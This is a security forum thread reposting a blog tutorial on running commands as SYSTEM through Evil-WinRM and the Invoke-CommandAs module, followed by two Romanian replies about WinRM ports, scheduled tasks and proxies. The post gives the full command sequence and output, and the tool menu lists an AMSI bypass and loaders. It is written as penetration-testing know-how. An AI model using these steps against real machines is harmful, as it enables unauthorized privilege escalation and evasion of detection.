Jump to content
Nytro

Run as SYSTEM using Evil-WinRM

Recommended Posts

Posted

Run as SYSTEM using Evil-WinRM

This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifcially in this case, PowerShell Remoting (WinRM).

First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far indepth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!).

Anyways.

I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note you should definitely bookmark thier blog it’s great.

Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs

For our uses all you need to do is get these two particular files:

  1. https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1
  2. https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1

Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install)

root@attacker:~/evil-winrm/scripts# ls
Invoke-CommandAs.ps1
root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-
--2020-09-13 20:17:56--  https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10009 (9.8K) [text/plain]
Saving to: 'Invoke-ScheduledTask.ps1'

Invoke-ScheduledTask.ps1                      100%[===========================================================================================

2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009]

Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in.

root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\uberuser\Documents>

Once I have the shell I load each of the scripts by typing out their file names (tab complete should work)

*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1
*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1

Once they are loaded you need to run the menu command to load the functions into memory on the attackers side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t.

*Evil-WinRM* PS C:\Users\uberuser\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
              By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Invoke-CommandAs
[+] Invoke-ScheduledTask

As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami:

*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem
nt authority\system
*Evil-WinRM* PS C:\Users\uberuser\Documents>

Sursa; https://malicious.link/post/2020/run-as-system-using-evil-winrm/

Posted

Nu e degeaba, e o alternativa la psexec (care e detectabil). WinRM e folosit de catre sysadmin (in mod oficial) pentru managementul sistemelor Windows folosind PowerShell asa cum SSH si bash sunt folosite pe Linux. 

Ce face de fapt e cam acelasi lucru, creeaza un scheduled task prin care ruleaza ca SYSTEM ce vrei tu. Desigur, necesita privilegile necesare. 

 

Nu "iesi cu procese de sistem spre Internet" - oricum nu exista o astfel de limitare. In plus, la nivel de sistem de operare se poate seta un proxy global dar nu e obligatoriu ca aplicatiile (orice fel, fie ca ruleaza sub user obisnuit fie ca ruleaza ca servicii gen SYSTEM) sa tina cont de ele. Exista functii din Windows care tin automat cont de ele, dar daca o aplicatie creeaza manual un socket si il conecteaza la un IP din Internet, nu o sa tina cont de acea setare. 

Posted

WinRM e un serviciu care poate rula pe mai toate Windows-urile cu Powershell. Foloseste HTTP (nu se transmit date clear-text ci doar foloseste HTTP ca protocol) pe portul 5985 si HTTPS pe portul 5986. Acest serviciu asculta pe acele porturi si sysadminii se pot conecta, loga si executa scripturi/comenzi Powershell.

 

Web-Proxy e folosit cand de pe un PC vrei sa te conectezi undeva pe Internet (si cum ziceam, poate fi bypassat by design daca e cel setat in Windows).

 

Sysadmin -- WinRM --> PC pe care are treaba -- HTTP via web proxy --> Site-urile pe care intra userul acelui PC

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...